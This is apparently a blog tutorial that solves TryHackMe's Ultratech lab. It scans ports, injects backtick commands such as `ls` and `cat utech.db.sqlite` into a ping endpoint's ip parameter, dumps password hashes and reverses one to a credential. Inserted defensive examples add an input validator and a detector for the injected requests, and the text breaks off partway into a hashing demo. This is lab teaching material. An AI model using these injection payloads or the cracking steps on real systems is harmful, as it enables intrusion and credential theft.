&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5kg9obgf01cnf4y9qihz.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5kg9obgf01cnf4y9qihz.jpeg" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, to provide a deeper dive into all these different phases, let's pick a room on TryHackMe where we can legally use all of these tools, walk through the structure step by step, and see how to build your methodology along the way.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 1 - Pre-Engagement Phase
&lt;/h2&gt;

&lt;p&gt;The pre-engagement phase represents the first contact between the client and the pentester. The objective of this phase is to define the scope of the penetration test and to agree with the client on a time estimate for the whole assessment. Some questions must be asked, and the scope must be clearly determined before anything else happens.&lt;/p&gt;

&lt;p&gt;In our example, we are going to test our methodology with &lt;a href="https://tryhackme.com/room/ultratech1" rel="noopener noreferrer"&gt;TryHackMe's Ultratech&lt;/a&gt;. Considering our pre-engagement discussions, our &lt;strong&gt;scope&lt;/strong&gt; would be the machine's IP, 10.10.148.123, and the &lt;strong&gt;time estimate&lt;/strong&gt; would be the box's expiration time, 1h (52m 14s in the screenshot).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvh4t8qe6al0xv044ocie.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvh4t8qe6al0xv044ocie.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 2 - Information Gathering
&lt;/h2&gt;

&lt;p&gt;This is arguably the most important step in a penetration test. During this phase the pentester collects intelligence on the target defined in the scope, in order to understand the target's attack surface and start strategizing on attack vectors. As the Pentest Standard states, "The more information you are able to gather during this phase, the more vectors of attack you may be able to use in the future".&lt;/p&gt;

&lt;p&gt;In our case, let's start by figuring out how many open ports our target has. To do so, we can run Rustscan from a Docker container with:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;docker run -it --rm --name rustscan rustscan/rustscan -a 10.10.148.123&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Let me explain this command to you:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;docker run -it --rm --name rustscan&lt;/strong&gt; - starts the Docker container I am running Rustscan from (interactive terminal, removed once it exits, named rustscan).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;rustscan&lt;/strong&gt; - Rustscan is a powerful and superfast network scanning tool, way better and faster than the traditional and well-known Nmap when used to identify open ports. When running a professional pentest (which will probably have a few days or weeks as its time estimate) you can run Rustscan multiple times, and also Nmap or other tools (like hand-crafted Python scripts), to be really sure which ports are open.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;rustscan/rustscan&lt;/strong&gt; - the Rustscan image, defining which container will be selected and used (in this case, since no specific version is given, it runs the latest).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;10.10.148.123&lt;/strong&gt; - Our target IP.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Since Rustscan is not packaged natively in Kali Linux, you might find useful information on how to install it in the official documentation: &lt;a href="https://hub.docker.com/r/rustscan/rustscan" rel="noopener noreferrer"&gt;https://hub.docker.com/r/rustscan/rustscan&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;If you want to run nmap as well for an all-ports scan, you can run:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;nmap -sC -sV -p- 10.10.180.145&lt;/code&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;nmap&lt;/strong&gt; - Runs nmap.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;-sC&lt;/strong&gt; - Runs nmap's default set of scripts against each service it finds, gathering extra reconnaissance on each of your findings.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;-sV&lt;/strong&gt; - Determines which service version is running on each of the open ports.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;-p-&lt;/strong&gt; - Runs nmap against all 65,535 ports available for communication. This is why it takes so long to finish, but when it's done you'll have proper information on all the available ports, instead of the default top most common ports you get when no port range is given.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Rustscan returns the following output:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0yd9avzq7lwng7ljmopm.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0yd9avzq7lwng7ljmopm.jpeg" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So now we know we have ports &lt;strong&gt;21, 22, 8081&lt;/strong&gt; and &lt;strong&gt;31331&lt;/strong&gt; open. In my methodology, after running Rustscan, I like to run a complete Nmap scan focused on the open ports, which returns detailed information on the ports that I already know are open.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;nmap -T4 -A -Pn -v -p 21,22,8081,31331 10.10.148.123&lt;/code&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;nmap&lt;/strong&gt; - Runs nmap.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;-T4&lt;/strong&gt; - Sets how fast nmap performs the scan. The timing templates range from T1 to T5, the latter being the fastest. However, it's important to note that a fast scan is also very "noisy" and will probably be detected easily by even a mildly secured target. Normally it's not ideal to use such a high speed against a real-world target, but running the same nmap scan at different speeds can be a good tactic to better understand the target's defenses and what they can actually detect.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;-A&lt;/strong&gt; - Enables OS detection, version detection, script scanning, and traceroute.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;-Pn&lt;/strong&gt; - Treats all hosts as online and skips host discovery.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;-v&lt;/strong&gt; - Increases the verbosity level, returning more detailed information on each step of the scan.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;-p&lt;/strong&gt; - Defines which ports will be scanned. If it's not specified, nmap runs against the top 1000 most common ports. In this case, we are specifying the ports we found in the previous step.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;21,22,8081,31331&lt;/strong&gt; - The ports we found with Rustscan.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;10.10.148.123&lt;/strong&gt; - Our target's IP.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The core information outcome from the nmap scan is detailed in the screenshot below.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffqzor6xr8dvd9mptk93h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffqzor6xr8dvd9mptk93h.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Phase 3 - Enumeration
&lt;/h2&gt;

&lt;p&gt;One can argue that Information Gathering and Enumeration are the same step. I would add that the process of gathering information can be extensive and even include Phase 4 - Vulnerability Analysis. Whatever you call those phases, one thing should be learned before all of this: gather as much information as possible. Enumerate every port you find, and analyze and model your threats as much as you can. This will make your life easier in the following steps, and it will also provide a lot of useful and valuable information to your client. At the end of the day, it's your job to inform them as much as you can, so the more you get out of this big &lt;em&gt;Discovery Phase,&lt;/em&gt; the better.&lt;/p&gt;

&lt;p&gt;Now that the naming question is out of the way, let's move on with our analysis. We know the open ports already, so let's start exploring them. In my personal methodology, I like to address any HTTP ports first to see if they serve a functional website from which I can extract more information. So let's start with our target's IP on port 8081 (the first open HTTP port from our scan).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkbsclci8bj4smg2h2f6h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkbsclci8bj4smg2h2f6h.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, this particular website looks like it's just a work in progress. Let's keep this as a note and try the other open HTTP port, 31331.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foi0o1j5c6fg8gpa0id98.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foi0o1j5c6fg8gpa0id98.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we have something cool here! This looks like a more complete, production-ready website. As pentesters, it's our job to explore every corner of this website looking for potential input areas, hidden information and every sort of alluring thing we can add to our report. In my case, I like to explore hidden directories first, since there is a lot more than meets the eye when it comes to web applications. Common practices such as running &lt;strong&gt;GoBuster&lt;/strong&gt; or &lt;strong&gt;DirBuster&lt;/strong&gt; can be really useful, but I like to start simple before bringing out my big, brute-forcing guns. The more you explore web applications, the more you'll notice a pattern when it comes to hidden directories, and then you can start writing your own personal list of directories to check. In my case, considering how important it is for applications nowadays to have a good SEO policy on their websites, I like to start with the very common &lt;strong&gt;robots.txt&lt;/strong&gt; file.&lt;/p&gt;

&lt;p&gt;But first, what is a &lt;strong&gt;robots.txt&lt;/strong&gt; file? To make it short, when Google's bots are scraping your website for keywords to enhance your SEO strategy and put it on the front page of every Google search, they will look for what they need in every directory. However, you can indicate to them which directories they should &lt;strong&gt;NOT&lt;/strong&gt; crawl for keywords, and the way you indicate it is by listing these directories in the &lt;strong&gt;robots.txt&lt;/strong&gt; file. The reasons may vary, but usually the directories found in this file are really important for administrative work on the website, and they are also hidden from the public eye, which means that some really good intel can be found there. Some other files and folders that can bring you good information are &lt;strong&gt;admin, login and upload&lt;/strong&gt; pages. But let's start with :31331/robots.txt to see what we can get.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F75kniduuk3ili8fm049y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F75kniduuk3ili8fm049y.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nice! We got some cool information about the site map, so let's go after it now.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9gs1mxmgc04wgohw1fek.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9gs1mxmgc04wgohw1fek.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A lot more information for us! Now we know about 2 pages we can explore (index.html is just the landing page), and we didn't even have to run a brute-forcing tool for that!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsqlua5amdo3pz2w8lpmi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsqlua5amdo3pz2w8lpmi.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Looking at the &lt;strong&gt;what.html&lt;/strong&gt; page, we can see that it's just a work-in-progress page. We can look for anything hidden in the source code, but apparently there is nothing outstanding there.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft0mwrjjmvlw5zrcis6ao.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft0mwrjjmvlw5zrcis6ao.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When we go to the &lt;strong&gt;partners.html&lt;/strong&gt; page, however, there is a login form there, just chilling. Login forms are amazing doors into the inner workings of a company, and exploiting them can be really damaging.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fovyjzujla71gikhoeu0a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fovyjzujla71gikhoeu0a.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, if we look in the source code, we are able to see some intriguing findings. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd7edi4pz88i1pdyzus4t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd7edi4pz88i1pdyzus4t.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here we have a link to an &lt;strong&gt;api.js&lt;/strong&gt; script, and after clicking on it, we are able to find the script's code.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbe4ag12iuh2v63jr7jz2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbe4ag12iuh2v63jr7jz2.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;There is a really cool line of code here, and this is the following:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;const url = `http://${getAPIURL()}/ping?ip=${window.location.hostname}`&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;According to the code, it will try to ping the API to check if it's working. We can look for more information on this by tweaking the parameters a bit and running it in our browser. Let's first try it with:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;http://10.10.147.25:31331/ping?ip=10.9.208.115&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Let me explain what I changed here. I switched the &lt;code&gt;${getAPIURL()}&lt;/code&gt; field to our target's IP plus the HTTP port we are on right now, and I changed the &lt;code&gt;${window.location.hostname}&lt;/code&gt; parameter to our machine's IP, in order to test whether it can ping our machine back.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwuwxcmkd9estutbvuxat.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwuwxcmkd9estutbvuxat.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Hmmmm, apparently it didn't work as expected. However, if you remember, there is another HTTP port open in this application, 8081. Let's try that one now by running:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;http://10.10.147.25:8081/ping?ip=10.9.208.115&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzlicvbcog6gpy4yj462u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzlicvbcog6gpy4yj462u.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Okay, this is way better! The output confirms that we can actually run and see terminal commands in our web browser! Now let's run a &lt;strong&gt;ls&lt;/strong&gt;, the Linux command to list all the files in a given directory, with:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;http://10.10.147.25:8081/ping?ip=`ls`&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;It's a similar request to the one we used before, but now with &lt;code&gt;`ls`&lt;/code&gt; at the end instead of our machine's IP.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl0iab2sprte8jj3ao8yf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl0iab2sprte8jj3ao8yf.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we have some more information about a database related to our target application, that can be really useful for us.&lt;/p&gt;

&lt;p&gt;So let's start exploring this database by running &lt;code&gt;cat&lt;/code&gt; on it. The whole command would be &lt;code&gt;cat utech.db.sqlite&lt;/code&gt;, so we need to enter &lt;code&gt;http://10.10.147.25:8081/ping?ip=`cat utech.db.sqlite`&lt;/code&gt; in our browser, which returns:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsviyqwklmu5dcqwaz8sq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsviyqwklmu5dcqwaz8sq.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;
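&lt;p&gt;As an added example (not code from the original post or from the Ultratech box), here is what the defending side of the &lt;code&gt;ping?ip=&lt;/code&gt; endpoint described above looks like: the parameter is accepted only as an IPv4 literal and handed to ping as a single argv element with no shell, so a value like the backtick-wrapped &lt;code&gt;ls&lt;/code&gt; is refused instead of executed. The same validator is then run over access-log lines to flag requests that carried anything other than an address. The log lines and all function names are constructed for this demo.&lt;/p&gt;

```python
"""Added example, not code from the original post or the Ultratech box: how the
ping endpoint described above is validated on the server side, with the shell
taken out of the call path, plus a log check that flags injected values.
Function names and the access-log lines are constructed for this demo."""
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit


def is_strict_ipv4(value):
    """Accept only a dotted-quad IPv4 literal. Hostnames, whitespace, shell
    metacharacters and backticks all fail to parse and are rejected."""
    if not isinstance(value, str):
        return False
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def ping_argv(ip):
    """Build the argv list for ping. A list with shell=False means the
    parameter is always one argument and never a second command; the
    validation on top keeps the argument sane for ping itself."""
    if not is_strict_ipv4(ip):
        raise ValueError("ip must be an IPv4 literal")
    return ["ping", "-c", "1", "-W", "2", ip]


def run_ping(ip):
    """Run the validated ping without a shell (not exercised by the test)."""
    return subprocess.run(ping_argv(ip), capture_output=True, text=True, timeout=5)


# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
10.9.208.115 - - [18/Mar/2023:17:07:45 +0000] "GET /ping?ip=10.9.208.115 HTTP/1.1" 200 120
10.9.208.115 - - [18/Mar/2023:17:08:02 +0000] "GET /ping?ip=%60ls%60 HTTP/1.1" 200 58
10.9.208.115 - - [18/Mar/2023:17:08:31 +0000] "GET /ping?ip=%60cat%20utech.db.sqlite%60 HTTP/1.1" 200 2048
10.9.208.115 - - [18/Mar/2023:17:09:10 +0000] "GET /partners.html HTTP/1.1" 200 3110
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_ping_requests(log_text):
    """Return the decoded ip values of /ping requests that are not IPv4
    literals. Anything listed here reached the endpoint with a value the
    validator above would have refused."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        parts = urlsplit(match.group(1))
        if parts.path != "/ping":
            continue
        # parse_qs percent-decodes, so %60 comes back as a literal backtick.
        for value in parse_qs(parts.query, keep_blank_values=True).get("ip", [""]):
            if not is_strict_ipv4(value):
                hits.append(value)
    return hits


if __name__ == "__main__":
    print(ping_argv("10.9.208.115"))
    print(suspicious_ping_requests(SAMPLE_LOG))
```

&lt;p&gt;The log check is deliberately built on the same validator as the endpoint: whatever the server would reject is exactly what should show up in a detection, which keeps the two from drifting apart.&lt;/p&gt;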

&lt;p&gt;Awesome! Now we have some (hashed) credentials that we can use, as soon as we crack them. So let's start by creating some new files to store them on our machine.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh34xgsxeibyiohg3we3y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fh34xgsxeibyiohg3we3y.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To crack the hashes, first we need to know which hashing algorithm was used to produce them in the first place. We can run &lt;code&gt;hash-identifier f357a0c52799563c7c7b76c1e7543a32&lt;/code&gt; to retrieve information about it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3ikii018p5wbefd9zzri.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3ikii018p5wbefd9zzri.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;hash-identifier&lt;/strong&gt; has disclosed that it's possibly an MD5 hash that we are dealing with.&lt;/p&gt;

&lt;p&gt;To try a reverse lookup (since a hash cannot be reversed directly) we can go to &lt;a href="https://md5hashing.net/hash" rel="noopener noreferrer"&gt;https://md5hashing.net/hash&lt;/a&gt;. This website is backed by a database of hashes and their original values, and it compares whatever string it gets as input with the values stored in the database in order to "decrypt" them.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flyxzy3iromn32pyr1tky.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flyxzy3iromn32pyr1tky.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv4en992d14xgbko9iedf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fv4en992d14xgbko9iedf.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nice, so now we have full credentials for one of the users! &lt;strong&gt;r00t:n100906&lt;/strong&gt; is something we can use later, for sure. Now, let's repeat the same steps with the other user.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fivq278ny1quo6cettbav.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fivq278ny1quo6cettbav.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And then, finally: &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe6xx8iu4kzs9vnr9u3i9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe6xx8iu4kzs9vnr9u3i9.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;However, this time we didn't get a value back. Which is okay: not every value is stored in the lookup database, and sometimes, even if you have a tailored wordlist with all the plausible values for a credential, you won't get a result. That's a good point for the company (even though leaving hashes accessible to malicious actors is a massive negative point), so for brevity we can move on to the next phase.&lt;/p&gt;
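&lt;p&gt;As an added example (not code from the original post), here is the mechanism behind the lookup site used above, and the fix for it. The table is built once from a wordlist and every unsalted MD5 from a dump can be looked up in it, because two users with the same password have the same digest. A salted, iterated password hash gives every user a different digest, so no such table can exist in advance, and the verifier compares in constant time. The wordlist, passwords and function names are constructed for this demo.&lt;/p&gt;

```python
"""Added example, not code from the original post: why the reverse lookup
above works against unsalted MD5, and why a salted, slow password hash
defeats the same precomputed table. The wordlist and passwords are
constructed for the demo; the function names are my own."""
import hashlib
import hmac
import os

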